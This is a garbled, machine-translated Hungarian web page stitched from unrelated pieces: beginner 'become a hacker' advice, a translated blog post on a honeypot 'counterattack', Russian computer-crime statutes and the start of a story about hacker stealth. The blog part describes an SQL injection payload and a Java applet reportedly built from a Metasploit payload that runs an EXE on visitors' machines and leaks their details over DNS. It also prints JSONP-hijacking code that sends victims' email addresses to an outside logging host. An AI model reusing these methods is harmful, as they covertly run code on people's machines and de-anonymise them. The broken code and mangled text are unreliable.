Otthon / Internet / Mit jelent elkapni egy hackert? Milyen hibái segítenek elkapni egy hackert, vagy hogyan ne égjen le? Aki feltöri a hackereket

Mit jelent elkapni egy hackert? Milyen hibái segítenek elkapni egy hackert, vagy hogyan ne égjen le? Aki feltöri a hackereket

Hol kezdje, ha meg szeretné tanulni a programkódok és a kriptográfiai csapdák vezérlését? Hogyan leszel hacker? Végül is könnyen betörhetnek valaki más számítógépébe, és közben több jelszót is feltörhetnek. Nincs semmi különös abban a vágyban, hogy hackerré váljon, mert legalább egyszer mindenki meg akarta nézni valaki más leveleit vagy fiókját.

Kik a hackerek?

Szóval hogyan leszel hacker? Mindenekelőtt meg kell értenie, mit jelent ez a kifejezés. Meg kell jegyezni, hogy a hackereknek semmi közük a különféle típusú támadókhoz, akik pénzlopással kereskednek bankszámlákés különféle erőforrásokat támadnak meg, hogy megakadályozzák a felhasználók hozzáférését azokhoz. A modern számítástechnikai szakemberek természetesen elvesztették magasan kvalifikált informatikusi státuszukat. A közelmúlt eseményei kapcsán rossz hírnévnek örvendtek a hétköznapi emberek körében.


De ez előtt a kifejezés előtt valódi számítógépes zsenik rejtőztek, akik képesek voltak saját, nem szabványos algoritmusaik alapján kijavítani a kódokat a programokban. Ezért, miután feltette a kérdést, hogyan lesz valakiből hacker, fel kell ismernie azokat a célokat, amelyeket ennek a nem egészen egyszerű és ritka szakmának az elsajátításával kell elérni. Figyelembe kell venni, hogy a jelenlegi szakaszban különféle korlátozások vannak a törvényekben. És nem hagyhatja figyelmen kívül őket, mert ez felelősséggel jár. Ezen kívül csalás a területen szoftver már most nagyszámú botrányos történet okozója. A főszereplők pedig bennük éppen a hackerek, akik azonban csak mások pénzének és titkainak tolvajainak babérjaira támaszkodhatnak.

Programozási nyelvek elsajátítása kötelező

Még mindig szeretnél válaszolni arra a kérdésre, hogyan lesz valakiből hacker? Akkor meg kell értenie, hogy megfelelő előkészítés nélkül semmit sem fog elérni. A terület elismert szakértőjének karrierje számítástechnikaés a programoknak a programozási nyelvek tanulási folyamatával kell kezdődniük. A jelenlegi szakaszban meglehetősen sok van belőlük. Meg kell érteni, hogy vannak nyelvek, amelyek lehetővé teszik a közvetlen kommunikációt személyi számítógépek. Segítségükkel különféle problémákra találhat megoldást. Az önálló programok létrehozásához modern eszközöket használnak. Ugyanakkor a hálózati programozás a programkódok külön ága, olyan parancsokkal, amelyek lehetővé teszik a dokumentáció felépítését. Segítségükkel az interneten is sokféle folyamatot adminisztrálhat.


Ha megpróbáljuk kitalálni, hogy ki a hacker, meg kell jegyezni, hogy van egy másik nyelvkategória is. Különféle tervezési mechanizmusokról beszélünk különböző programokat platformok kompakt eszközökben ( mobiltelefonok). Ebben a tekintetben, amikor egy bizonyos tevékenységi terület mellett dönt, ki kell választani a megfelelő programozási nyelvet. Erre kell a legtöbb figyelmet fordítania.

Még egyszerű utasításokat tudást igényelnek

Természetesen a feltörés érdekében email, a jelenlegi szakaszban használhatja lépésről lépésre utasításokat. Azonban nem engedik meg, hogy megértse, ki a hacker. És a különböző programok működési elveit, valamint az interneten történő adatátvitel bonyolultságát továbbra is tanulmányozni kell. Ezzel kapcsolatban először meg kell próbálnia tanulmányozni a hackerek és programozók környezetére jellemző terminológiát. Konkrét kifejezéseken keresztül kommunikálhat számítógépes szakemberekkel anélkül, hogy félne az amatőröktől, akik nem rendelkeznek elegendő tudással egy speciális „nyelv” megértéséhez.

Tanulmányozni kell operációs rendszerek

Hogyan lehetsz hacker? A leckék, amelyeken keresztül tanulmányozhatják ezt a tevékenységi területet, sok időt, erőfeszítést és vágyat igényelnek. Mi kell még a terminológia és a programozási nyelv tanulásán kívül? Meg kellene tanulnod olvasni az operációs rendszereket. A Unix/Linux hackercsaládnak számít. Elég fontos jellemzője A unixok nyílt forráskódúak. Elolvashatja, hogyan íródott az operációs rendszer. Lehetőség van annak alapos tanulmányozására. Kísérleteket is tehetsz valami megváltoztatására. Ezenkívül a Unix/Linux internet-orientált.

Internet és script ismereteket igényel

Ahhoz, hogy hackerré váljon, meg kell értenie a világháló használatát. Meg kell értened a HTML írásának alapelveit is. A web komoly kivétel, remek játék a hackerek számára. Ahogy a politikusok mondták, az internet képes megváltoztatni a világot. És csak ezért meg kell tanulni, hogyan kell vele dolgozni.

Ha még nem tanult meg egy programozási nyelvet, a HTML-ben való írás segít hasznos ismeretek elsajátításában. Hasznosak lesznek a programkódok és az írási elvek elsajátításakor. Ebben a tekintetben meg kell tanulnia, hogyan készítsen legalább kezdőlapokat. Próbáld ki az XHTML-t is. A klasszikus HTML-hez képest ügyesebben van megtervezve.

Technikailag a World Wide Web számítógépes hálózatok komplexuma. Jelenleg azonban meglehetősen fontos kommunikációs médium, amely számos feladat elvégzésére használható. Meg kell érteni, hogy az orosz hackereknek tudniuk kell angolul. Ennek oka a csak ezen a nyelven elérhető nagy mennyiségű információ.

Nem szabad monotonitásnak lenni

Számítógépek, programok és a világháló szakértőjének lenni nagy öröm. Ez azonban maximális erőfeszítést igényel. Ennek megfelelően motivációra van szükség. Ahhoz, hogy hacker legyél, élvezned kell a problémák megoldásának folyamatát, miközben fejleszted készségeidet és edz intelligenciádat. Az ilyen szintű szakemberek soha nem unják meg, hogy sok nyelvet és programot hosszan és gondosan tanulnak, és a munka nem tűnik monotonnak. Azt csinálnak, amit szeretnek.

Hogyan lehetsz hacker? Programkészlet (operációs rendszerek, programozási nyelvek, nyílt forráskód stb.), angol nyelvtudás, valami új megértésének vágya - mindez segít céljai elérésében. De mire kell még emlékezni?

  • Nem szabad megfeledkeznünk arról, hogy ahhoz, hogy vállalkozása egyik legjobbja lehessen, csak a legnehezebb problémákat kell megoldania. Nem kell túl nagy önbecsüléssel rendelkeznie. Csak célokat kell kitűznie maga elé, és napról napra fejlődnie kell. Ha valami nem volt világos ma, holnap meg kell próbálnia megérteni az összetett kérdést. Ha egy új készséget nem tanult meg, akkor nagy valószínűséggel elvesztegette a napot. Nem szabad szívességet tenned magadnak.

  • Nem mind számítógépes szakemberek azonosak. Van, akit csak a haszonszerzés érdekel. Van, aki tudásra, információra törekszik, olykor törvényt sért. De minden híresség hackernek más a célja. Ez lehetővé teszi számukra, hogy jelentős magasságokat érjenek el szakmájukban.
  • Kezdőként ne próbálja meg feltörni a nagyvállalatokat vagy kormányzati szerveket. Meg kell érteni, hogy azok az emberek, akik felelősek ezeknek a rendszereknek a biztonságáért, valószínűleg sokkal jobban értik az üzletüket. Meg kell jegyezni, hogy az ilyen szakemberek még akkor sem reagálnak azonnal, ha behatolást észlelnek. Először megvárják, amíg a hacker komolyan támad. Más szóval, egy újonc biztonságban érezheti magát egy feltörés után, ha folytatja a rendszerek vizsgálatát, például a sebezhetőségek után kutatva. És ebben az időben a szakemberek aktívan csapdába csalják őket.
  • Folyamatosan fejlődni kell a szakirodalom tanulmányozásával.
  • Következtetés

    A fentiek alapján levonhatjuk a következtetést. Folyamatosan tanulmányoznunk kell a különféle tudományágakat, nyelveket, irodalmat és az internetet. Nincs olyan sok hacker. Ezért ahhoz, hogy közéjük tartozhasson, kezdetben fel kell készülnie a fáradságos és hosszú munka mindenekelőtt magadon. És mégis, ha gyermekkora óta nem szereti a logikai problémák megoldását, akkor próbáljon meg más tevékenységet találni magának, amely nem igényel ötletelést, maximális kitartást és komoly türelmet.

    Hogyan váljunk hackerré a semmiből

    A hivatásos hacker munkája nagyon érdekes. Weboldal feltörése, lopás fontos információkat, pénzlopás, behatolás, titkok felfedése. Egy igazi hacker lehetőségei végtelenek. Ami a nevét illeti, gondosan el van rejtve.

    A fiatalokat vonzó tevékenység az információlopás és a weboldalak feltörése. De nem veszik figyelembe, hogy az ilyen cselekedetekért gyakran a törvény előtt kell felelniük.

    A munka nem mindig jár illegális tevékenységekkel, és ez tény. Ha számítástechnikai területen szeretne dolgozni, nagyvállalatok veszik igénybe szolgáltatásait. És ez nem meglepő, mert a hacker első osztályú informatikus.


    A gyakorlat azt mutatja, hogy a vállalatok és a nagy bankok profi hackert szeretnének a személyzetükbe. A szervezetek számítástechnikával védik a fontos információkat, a szakember pedig képes felderíteni a biztonsági réseket és megakadályozni az adatlopást.

    Csak az önfejlesztés segít a szakma megtalálásában. Megosztok néhány tippet, és segítségükkel közelebb kerülhet álmához, és talán megvalósíthatja azt.

    Lépésről lépésre cselekvési terv
  • Alapkészségek. Mindenekelőtt ismerkedjen meg az internettel, ismerje meg a különböző címsorok jelentését, tanuljon meg sok alapvető fogalmat, és értse meg a böngészők és a szerverek interakcióját.
  • Programozási nyelvek. Különös figyelmet kell fordítani a programozási nyelvek tanulására. Az interneten bővelkedő oktatóanyagok segítségével tanuljon meg egyszerű programokat írni. Kis erőfeszítéssel elsajátítod a programozási ismereteket, a jövőben pedig lehetőséged lesz ezek fejlesztésére.
  • Ha arról álmodozik, hogy hackerként dolgozzon, fordítson különös figyelmet a HTML nevű hipertext jelölőnyelv megtanulására.
  • angol. Nem nélkülözheti az angol tudást. Ezt a nyelvet a világ összes szolgáltatása használja. Ezért a birtoklása kötelező.
  • A felvázolt négy pont segít az alapvető készségek elsajátításában. A feladat elvégzése után kezdje el tanulmányozni a szakmai kérdéseket és a hackelés fortélyait. Szerencsére az internet tele van a mai témához kapcsolódó információkkal.

    • Értékelje az idejét és a kollégáit. Feltétlenül ossza meg eredményeit „karbantartó testvéreivel”.
    • Tartsa tiszteletben a kódot. A hackereknek saját kódjuk van, amely tiltja a cserébe való adást vagy elvételt. Ha sikerült feltörnie valaki más programját, értesítse a tulajdonost, hogy dolgozhasson az agyszüleménye védelmén.
    • Távolítsa el a sztereotip gondolatokat. Egy hackernek nem szabad sztereotípiákban gondolkodnia. Képesnek kell lennie arra, hogy gyorsan és mindig választ találjon.
    • Kérjen tanácsot. Ha valami nem világos, ne habozzon tanácsot kérni egy tematikus fórumon. Ha saját maga oldotta meg a problémát, ossza meg kollégáival a megoldási algoritmust. A jövőben is ezt fogják tenni.
    • Tartsa szemmel a technológiát. A számítógép egy élő szervezet és egy informatikus közeli barátja. Ezért a számítástechnikai berendezések, helyhez kötött rendszerek, laptopok vagy netbookok gondozást igényelnek.

    Érje el gyorsan a célt, ha szövetségeseiből álló csapata kitartással és szabadidővel bővül. Minden nap új információkat kell megtanulnia, amelyek tapasztalatokat hoznak.

    Videó tippek


    KÖRÜLBELÜL számítógépes játékok Jobb elfelejteni. Töltsön szabadidőt olyan ismeretek megszerzésével, amelyek a jövőben hasznosak lesznek. A kellemetlen helyzet elkerülése érdekében feltétlenül olvassa el a Btk.

    Hogyan válhat hackerré, hol kezdjem

    Folytatva a mai cikk témáját, megvizsgáljuk a képzés fő szakaszait, hogy részletesen megtanuljuk, hol kezdje el a hackerré válást.

    A játékfilmekben a hackerek fizetési rendszereket, kormányzati webhelyeket, nagy szervezeteket és ipari létesítményeket törnek fel. A hackelés fő célja fontos információ vagy pénz. A valóságban minden nem ilyen egyszerű.

    A hacker egy közönséges programozó, aki képes feltörni a szoftverkódot. Vannak azonban más céljai is. Nem törekszik fontos adatok megszerzésére és nagy pénzért eladni a feketepiacon. A hackelés során a szakember megismerkedik egy adott program működési elvével, tanulmányozza a kódot, hogy megtalálja a lyukakat, és létrehozzon egy analóg vagy hasonló programot.


    Sokan a hackereket hacker-pusztító bűnözőknek tartják, ezért vannak „szakemberek”, akik nem hackerek, de megpróbálnak hasonló életmódot folytatni. Még egy kezdő is károsíthatja a webhelyet vagy a számítógépet, ha olyan rosszindulatú szkriptet használ, amely programnak álcázza magát, és webhelyekre kerül.

    A való életben problémás egy igazi szakemberrel találkozni ezen a területen. Egy tapasztalt hacker soha nem fogja megmondani, mit csinál. Egyedül dolgozik, mert tudja, hogy az ilyen tevékenység büntetendő.

  • Légy türelmes. Vegye észre, hogy a készségek elsajátítása éveket vesz igénybe.
  • Fordítson különös figyelmet az alkalmazott matematika tanulmányozására. Hidd el, matematikai ismeretek nélkül nem leszel képes hackerré válni.
  • Ügyeljen arra, hogy olyan könyveket vásároljon, amelyek a programok, szoftverplatformok és biztonsági rendszerek működésével foglalkoznak.
  • Tanuljon meg kódot írni és titkosított rendszereket létrehozni külső segítség nélkül. A munka ezen képességek nélkül lehetetlen.
  • Olvasson tematikus magazinokat, látogasson el a hackelési tevékenységekkel foglalkozó webhelyekre és fórumokra. Az információforrások segítenek az önfejlesztésben.
  • Vezess naplót. Rögzítse a sikerek és eredmények statisztikáit. Idővel észre fogod venni, hogy képességeid fejlettebbek lettek.
  • Készüljön fel arra, hogy az otthoni tanulás hosszadalmas lesz, és maximális erőfeszítést igényel. Csak így lehet meghódítani a csúcsokat és megtörni a sztereotípiákat. Ne feledje, a törvények keretein belül kell eljárnia.

    Videó

    Remélem, hogy a történet segíteni fog, és Ön, miután megismerte az anyagot, gyorsan sikereket ér el.

    Ne felejtse el, hogy olyan programok létrehozása vagy módosítása, amelyek fontos információk illegális másolásához, blokkolásához vagy megsemmisítéséhez vezetnek, büntetendő bűncselekmény. Az ilyen cselekményekért 3 év börtönbüntetésre és pénzbírságra számíthatnak.

    Nemegyszer szembesültem olyan kérdésekkel a felhasználóktól, hogy lehetséges-e valahogy azonosítani azt a hackert, aki feltörte ezt vagy azt a webhelyet. A kérdés elég érdekes, és nem lehet rá egyértelmű választ adni. Természetesen minden a támadást végrehajtó személy képzettségétől és óvatosságától függ. De amint a gyakorlatban kiderül, sok hacker elég ostoba hibákat követ el, és felfedi névtelenségét. Lássuk hogyan.

    Először is...miért kell ez nekem? Nem vagyok „hárombetűs srác”, hanem szerény mérnök, egyelőre nem tervezem, hogy átvegyem a világot, és nem veszek részt egyéb gátlástalan dolgokban, akkor miért nem szerettem az anonimitást? A válasz egyszerű – névtelen, hackerek, forgatókönyvíró kölykök... Ezek a srácok mindig megpróbálnak feltörni valamit, ellopni, elrontani vagy elvinni a vészhelyzetüket. Ez, ha belegondolunk, nem is olyan rossz (jobb, mint a sikátorban drogozni), de mivel a srácok szeretnek játszani, játsszunk velük.

    Az anonimitásuk nem szent dolog, ezért lehet vele harcolni. 8) De általánosságban elmondható, hogy mindez minden internetezővel működik, én csak a támadók ellen tettem erőfeszítéseket, akik illetéktelen hozzáférést próbálnak elérni és megsértik a 272. cikket. az Orosz Föderáció Btk. Ezen túlmenően, tapasztalatom érdekesen illusztrálja a maguk támadói elleni „ellentámadások” témáját. automatikus üzemmód emberi beavatkozás nélkül. Az ellentámadás eredménye a támadóval kapcsolatos információk nyilvánosságra hozatala, ami ugyebár jó, nem rossz...

    Hordó méz

    Annak érdekében, hogy ne sértse meg az ártatlan állampolgárok névtelenségét, és csak a „gazemberek” ellen támadjon, meg kell bizonyosodnia arról, hogy a kérdéses felhasználó hacker. Ehhez elegendő egy olyan rendszer, amely elemzi a látogatók viselkedését, és egy olyan mechanizmust, amely észleli a „támadó” akciókat. Röviden: csak egy mézesedényt kell készítenie. Ehhez nem kell bevetni a honeyd stb. Például egy WEB-erőforrás általános esetére elegendő egy pszeudo-működő szkriptet elhelyezni az éles szerveren, amely hasznosnak és működőképesnek tűnik, de valójában érzékeli a behatolási kísérleteket, és ha egy „sikeres” támadás, úgy tesz, mintha a feltörés sikeres volt. Ezt követően hajtson végre ellentámadást az adott felhasználó ellen.

    Egy jó példa, hozzunk létre egy admin.php vagy /admin/ szkriptet, mindegy, minden magát tisztelő támadó néhány másodperc alatt megtalálja ezt az URI-t, ez nyilvánvaló lépés. Ha szeretné felhívni a nem kívánt elemek figyelmét a csapdára, elhelyezhet egy hivatkozást a következővel kezdőlap(azt mondják, itt van az admin), mert az a fő feladat, hogy a rosszfiú előbb kezdje el támadni a honeypot-ot, ne pedig normális scriptekben turkáljon.

    Az pszeudo-admin szkriptben nyilván bejelentkezést és jelszót kérnek. Ezután csak fantázia kérdése, megvárhatja, amíg a támadó brutálisan kikényszeríti a jelszót, vagy emulálja az SQL Injection osztály sebezhetőségét, majd az osztály bármely jelszava megteszi. ‘ vagy 1=1/*, amely hozzáférést biztosít az „admin panelhez”. Ugyanakkor statisztikákat is gyűjthetünk - hogyan törték fel az adminisztrációs panelt, kiválasztással vagy SQLi-n keresztül. Nos, ez magától értetődő – aki bekerül az „admin panelbe”, az „rossz” srác, és a névtelenségének nyilvánosságra hozatala nem okoz nekem erkölcsi problémákat.

    Igazából 2011-ben feltettem egy ilyen szkriptet a weboldalamra, és elkezdtem várni... Nem vártam sokáig, mivel az oldalt az információbiztonság témájának szentelték, a feltörni akarók száma meghaladta az összeset képzelet.

    Üss a homlokomba

    Nyilvánvaló, hogy a legáltalánosabb esetben a webhelylátogatóról (a mi konkrét esetünkben a támadóról) csak egy IP-cím, egy User-Agent stb. Ahogy mondtam, mi nem vagyunk CIA/FSB/MOSSAD... nem rendelkezünk vagy PRISM-mel, és megértjük, hogy egy IP-cím (a különböző proxyszerverek és a TOR alapján) valójában SEMMI. A legtöbb esetben ezzel foglalkozunk, de ha kijátszunk egy-egy finom lélektani momentumot (konkrétan a forgatókönyv-gyerekekkel kapcsolatban), akkor kiderül, hogy ezek a srácok nem trükkre számítanak! Más szóval, az „adminisztrációs panel” testében bármit megtehet - például leakaszthat egy zsákmánycsomagot, és megütheti a gondatlan embereket. De "laposabban" játszottam, elindítottam a Java Applet-et. Például Önt hitelesítették... itt van a GUI panelünk Java nyelven.

    A social engineering egyik eleme – a támadó egy sikeres SQLi-támadástól örömrohamban ostobán elindíthat egy kisalkalmazást. És... Meglepődtem, de volt belőlük elég (persze később, idővel visszaesett a penetrációs százalék, hiszen a beállítással kapcsolatos információk gyorsan elterjedtek egy szűk szakember körében;). Valójában az applet hülyén rándult EXE fájl a szerverről, és elindította.

    Az EXE fájl NEM SZEMÉLYES adatokat gyűjtött (igen, igen, követem a személyes adatokról szóló szövetségi törvényt...), csak a következő információkat: helyi IP, nyomkövetési útvonal a hálózatról, gép neve, felhasználói bejelentkezés. Ez nem sok, de a legtöbb esetben elegendő a TOR/Proxy/VPN megkerülése és még a támadó nevének kiderítése is! Emellett természetesen lehetőség lenne például a környező hozzáférési pontok BSSID-jének összegyűjtésére, a laptop webkamerájáról képeket készíteni, a csavarról konfig fájlokat elemezni stb., stb. Röviden, a lényeg az, hogy a támadó PC-jére telepített „ellenfelderítési ügynök” sok akadályt megkerültünk, és a TOR és a Proxy már nem működik. Nyilvánvaló ellentámadás.

    Megjegyzés: az ügynökömnek nem volt távoli hozzáférés, bár technikailag kódolható, nem akartam hátsó ajtót terjeszteni és rosszindulatú programokat terjeszteni. Ez az ügynök nem volt rosszindulatú, mivel pusztán technikai információkat gyűjtött a támadó számítógépéről és annak hálózati környezetéről. Mellesleg, az összes adatot fordított DNS-csatornán keresztül továbbították, ami javította az adatok sikeres „megérintését” - http://www.xakep.ru/post/55661/.

    1) Az Orosz Föderáció Védelmi Minisztériuma

    Az elsők között a Honvédelmi Minisztérium KÜLSŐ IP-jének srácai próbáltak SQLi típusú támadást alkalmazni. Orosz Föderáció. Szerencsémre vagy nem estek be az appletbe, vagy Linux volt (mivel platformközi funkcionalitást kellett hozzáadnom). Tudom, hogy vannak ott jó fiúk, és persze nem akartak rosszat! De remélem, hogy a valódi "hírszerző műveletek" során legalább kínai proxyszervert használnak 😉

    2) Víruskereső cég

    Ez az indítás a következővel készült virtuális gép vírusirtó cég. A DNS szerver és a tracert leégette az irodát 8) Figyelemre méltó, hogy a srácok nem vették fel az ügynököt a rosszindulatú programok listájára! Értékelve. Köszönöm srácok!

    3) Egy csomó srác

    Csak egy csomó különböző srác, volt, aki tudott a funkcióról, és csak játszott, volt, aki nem (http://habrahabr.ru/post/122107/#comment_4003842)

    4) És a legérdekesebb dolog az egyik FÁK-ország INTELLIGENCE tulajdonában lévő Host. „Reverse” behatolással.

    Először úgy döntöttem, hogy ez az, elkezdődött a kiberháború! Ügynökünk egy ellentámadás következtében egy másik állam titkosszolgálatához tartozó gazdára futott. Csak a fiók tűnt szolgáltatási fióknak, ami arra utalt, hogy a gazdagépet feltörték, és közvetítőként használták. Valamivel később ugyanazon a napon egy második „ügynök” telepítését kaptuk ugyanabból az országból, de ezúttal nem egy kormányzati ügynökségi hálózatról, hanem egy otthoni számítógépről. A PC-s felhasználónévről kiderült, hogy a Google számára könnyű volt, és a személy azonosítása gond nélkül ment. Ugyanakkor ezeket a „véletleneket” figyelembe véve azt mondhatjuk, hogy vagy ennél a hírszerző szolgálatnál dolgozik, vagy valamilyen módon hozzájutott egy kormányzati házigazdához.

    Ricochet által okozott sérülés

    Oké, megértjük, hogy az anonimitás felfedésének legegyszerűbb módja az exploit csomagokkal vagy SI-elemekkel történő ellentámadás, de ez vastag és nyilvánvaló. De volt egy másik ötlet is - harmadik féltől származó szolgáltatások, mint például a webmail vagy pl. közösségi média. Láthatatlanabbá teheti a támadást... amit én tettem 8)

    Igen, az applet mellett egy sikeres támadás esetén megtudtam a támadó e-mailjét, hogy pontosan tudjam, „ki a hibás” (na, az már világos..). És ismét, az anonimitás nem TOR/VPN/proxylánc. Ez nem elég! A lényeg tehát egyszerű, ha egy állampolgár olyan szolgáltatásokat használ, mint a VKontakte, yandex, google, linkedin, twitter, facebook stb... és közben folyamatosan hitelesítik rajtuk, akkor ha vannak sebezhetőségek () ezek a szolgáltatások, az Ön névtelensége feltárul. Történt ugyanis, hogy a mail.ru és a yandex.ru szolgáltatásokban sebezhetőséget találtak (már régen jelentettem őket, és már régóta vannak foltozva, de sikerült tesztelnem őket a „tudományos” kedvéért ” kísérlet a gonosz srácok gyakorlati elfogására...). A leggyakoribb biztonsági rés (mindkét szolgáltatásnál): JSONP-eltérítés. A lényeg egyszerű, van egy bizonyos szolgáltatás:

    mail-service.com/ajax?callback=func

    Ennek megfelelően a hiányosság kihasználása és az anonimitás felfedése érdekében a következő kódot használjuk:

    függvény func(obj) ( var url="http://loger.com/log.php?value="+obj["e-mail"]; $.get(url); } !}

    függvény func(obj)

    var url = "http://loger.com/log.php?value=" + obj ["e-mail" ] ; !}

    $. get(url);

    < script src = "http://mail-service.com/ajax?callback=func" / >

    Tehát ne feledje: elfelejtheti a TOR/VPN-t, ha mindig a közösségi médiában tartózkodik. a hálózatoknak még csak „buta” CSRF/XSS-re sincs szükségük ahhoz, hogy nyomon kövessék, ki vagy és honnan származol.

    Tipikus támadó:

    És még valami...

    Mellesleg, ennek a megközelítésnek egy másik példájaként a linkedin hálózatnak nincs is szüksége sebezhetőségre, ez egy valódi funkció - a profilodat megtekintők naplója. Vagyis ha hülyeségből átirányítást teszek egy speciális regisztrált linkedin profilra az adminisztrációs panelemen:

    Ennek eredményeként a támadókról további információkat tudhatunk meg közvetlenül a Linkedin oldalon:

    Egyébként észreveheti, hogy a SAMEORIGIN nem segít, hiszen GET kérésátmegy, mielőtt a böngésző ellenőrizné az ORIGIN szabályzatot, az ellenőrzés AKKOR történik meg 😉

    Statisztika

    Végül néhány statisztika. A kísérlet 2011 második negyedévétől 2012 harmadik negyedévéig tartott.

    Összes EGYEDI SQLi támadás – 484 (~1,2 évig)

    Ebből sikeres ellentámadások (Java Applet) - 52 (~1,2 év alatt)

    Ebből 16 sikeres ellentámadás volt a mail.ru/yandex.ru oldalon (6 hónapon át)

    ~17%-os sikerarány ellentámadásokkal.

    Függőségi grafikon:

    Mint látható, az elején volt egy kisalkalmazás, és a „szappant” jóval később tettem hozzá. A látogatottság csúcsa a ZeroNights és a Defcon csoport üléseinek bejelentéseihez kapcsolódik. A levelek áttörése valójában lineáris, míg az appleteknél a függőség csak a kísérlet elején volt lineáris. Ez a Java-frissítéseknek köszönhető, majd hozzáadta a kisalkalmazást a rosszindulatú programok adatbázisához (ami nem meglepő, mivel egy metasploit hasznos adatból állították össze)

    P.S. Egyébként ha a yandex.ru-nál van hova jelenteni a talált hibákat, akkor a mail.ru esetében addig nem találtam kapcsolatokat, amíg nem találkoztam a helyi biztonsági szakemberrel, és személyesen ki nem szivárogtattam neki a hibát...

    Következtetések

    Bár ez a blogbejegyzés inkább arról szól, hogyan fogtam ki a „rosszfiúkat”, igaz, ez az internetes anonimitás problémáira is extrapolálható – ha az IT/IS szakemberek és a hackerek lángolnak, akkor mi a helyzet a normális emberekkel? Nyilvánvaló, hogy a TOR/Proxy és a VPN nem segít ebben a kérdésben. Egy közösségi hálózaton való bejelentkezés, a figyelmetlenség és még sok más elég ahhoz, hogy egy webes erőforrás látogatóját egy valós személlyel egyértelműen párosítsa. Legyen óvatos, és JFYI: Hogyan működnek az igazi gonosz hackek

    Szia Nadezhda! Leiratkozott a blogomról, mondván, hogy rendelkezik egy számítógépes bűnöző összes adatával, de nem tudja, hogyan használja fel a támadó megbüntetésére. Engem is érdekelt ez a kérdés, ezért megosztom azokat az információkat, amiket sikerült „kihalásznom” ez ügyben a jelenlegi, sok rossz ember által hackerek és csalók formájában meggyalázott internet hatalmas tárházából:

    — Panasz a webhelyén támadást végrehajtó hacker szolgáltatójánál. Miután korábban összegyűjtötte az összes rendelkezésre álló bizonyítékot (képernyőképek, naplók, adatok, levelezés stb.). Úgy tűnik, hogy a szolgáltató azon döntését, hogy blokkolja az internetet egy támadó számára, bíróságon keresztül hozza meg. nem tudom pontosan.

    — Kapcsolatfelvétel a bűnüldöző szervekkel, különösen az FSB-vel. Az Orosz Föderáció Büntető Törvénykönyve a következő cikkeket tartalmazza:

    Az Orosz Föderáció Büntető Törvénykönyve 28. fejezet: Bűnözés a számítógépes információk terén
    272. cikk. Számítógépes információkhoz való illegális hozzáférés
    1. Törvény által védett számítógépes információhoz, azaz számítógépes adathordozón lévő információhoz, elektronikus számítógépen (számítógépen), számítógépes rendszeren vagy azok hálózatán történő jogosulatlan hozzáférés, ha ez a cselekmény az információ megsemmisítésével, blokkolásával, módosításával vagy másolásával, megzavarásával járt. a számítógép, a rendszer Számítógép vagy annak hálózata működtetése - a havi minimálbér kétszáz-ötszázszorosáig terjedő pénzbírsággal, vagy az elítélt munkabérének vagy egyéb jövedelmének mértékéig terjedő pénzbírsággal sújtható. öt hónapig, vagy hat hónaptól egy évig terjedő javítóintézeti munkával, vagy két évig terjedő szabadságvesztéssel.

    2. Ugyanezen cselekmény, amelyet előzetes összeesküvés vagy szervezett csoport, vagy hivatali beosztását igénybe vevő személy, továbbá számítógéphez, számítógépes rendszerhez vagy azok hálózatához való hozzáféréssel követ el, pénzbüntetéssel büntetendő. a minimálbér ötszáz-nyolcszázszorosának megfelelő összegben, vagy az elítélt munkabére vagy egyéb jövedelme összegében öttől nyolc hónapig terjedő időtartamra, vagy javítóintézeti munkára egy-két évig terjedő időtartamra, vagy letartóztatásra. háromtól hat hónapig terjedő szabadságvesztés, vagy öt évig terjedő szabadságvesztés.

    273. cikk. Rosszindulatú számítógépes programok létrehozása, használata és terjesztése
    1. Számítógépes programok készítése vagy meglévő programok módosítása, amely az információk jogosulatlan megsemmisítéséhez, blokkolásához, módosításához vagy másolásához, a számítógép, számítógépes rendszer vagy hálózatuk működésének megzavarásához, valamint az ilyen programok felhasználásához vagy terjesztéséhez vezet. vagy ilyen programokat tartalmazó számítógépes adathordozót - három évig terjedő szabadságvesztéssel büntetendő a havi minimálbér kétszáz-ötszázszorosáig, vagy a munkabér vagy egyéb jövedelem összegéig terjedő pénzbüntetéssel. elítélt személy kettőtől öt hónapig terjedő időtartamra.
    2. Ugyanazok a cselekmények, amelyek gondatlanságból súlyos következményekkel jártak, -
    háromtól hét évig terjedő szabadságvesztéssel büntetendő.

    274. § A számítógépek, számítógépes rendszerek vagy hálózataik üzemeltetésére vonatkozó szabályok megsértése
    1. Számítógéphez, számítógépes rendszerhez vagy annak hálózatához hozzáféréssel rendelkező személy a számítógép, a számítógépes rendszer vagy annak hálózata üzemeltetési szabályainak megsértése, amely a számítógépes információ törvény által védett megsemmisítését, blokkolását vagy módosítását eredményezi, ha ez a cselekmény jelentős kárt okozott, -
    bizonyos tisztségek betöltésére vagy bizonyos tevékenységek végzésére való jogosultságtól öt évig terjedő időtartamra elzárással, vagy száznyolcvan-kétszáznegyven óráig terjedő kötelező munkavégzéssel, vagy szabadság korlátozásával büntetendő. legfeljebb két év időtartamú.
    2. Ugyanaz a cselekmény, amely gondatlanságból súlyos következményekkel járt, -
    négy évig terjedő szabadságvesztéssel büntetendő.

    A „bosszú” mindkét módszere hihetetlen bürokráciával, bíróságokkal stb.

    Egy fiatal hacker, akinek a számláján rengeteg feltört gép volt, sikertelenül próbált hozzáférni egy nemzetközi bank szerveréhez. Végül feltörte ezt a rendszert, és több álmatlan éjszakát töltött rajta. „Valóban észlelték, hogy megtisztítottam a rönköket, és rendkívül óvatos voltam” – gondolta. Gondolatait hirtelen megszakította az UPS halk nyikorgása, ami áramszünetet jelentett. Ekkor hangos kopogtatás hallatszott az ajtón, ami mögött felfegyverzett szövetségi alkalmazottak álltak. Ez a történet szomorú véget ért volna, ha a szerencsétlen hacker nem... ébred fel az ébresztőórája csikorgására.

    Valójában kevés hacker hackelne bankrendszerek anélkül, hogy ismerné saját biztonságának alapjait. A stratégiailag fontos rendszerek adminisztrátorai nem hülye emberek, és jó pénzt kapnak a munkájukért, ezért nagyon veszélyes velük versenyezni a számítástechnikai ismeretek terén.

    De megtörik! Eltörnek, és hónapokig vagy akár évekig észrevétlen maradnak a szervereken. És mindez az alapvető álcázásnak köszönhetően. Ezt általában több íratlan törvény betartásával érik el, amelyeket minden önmagát tisztelő hacker ismer. Ezen szabályok egyikének megszegésével sebezhetővé válhat az adminisztrátorokkal szemben, akik azonnal észlelik és hatástalanítják a talált behatolót. Ebben az esetben a következmények nagyon súlyosak lehetnek a szabálysértő számára.

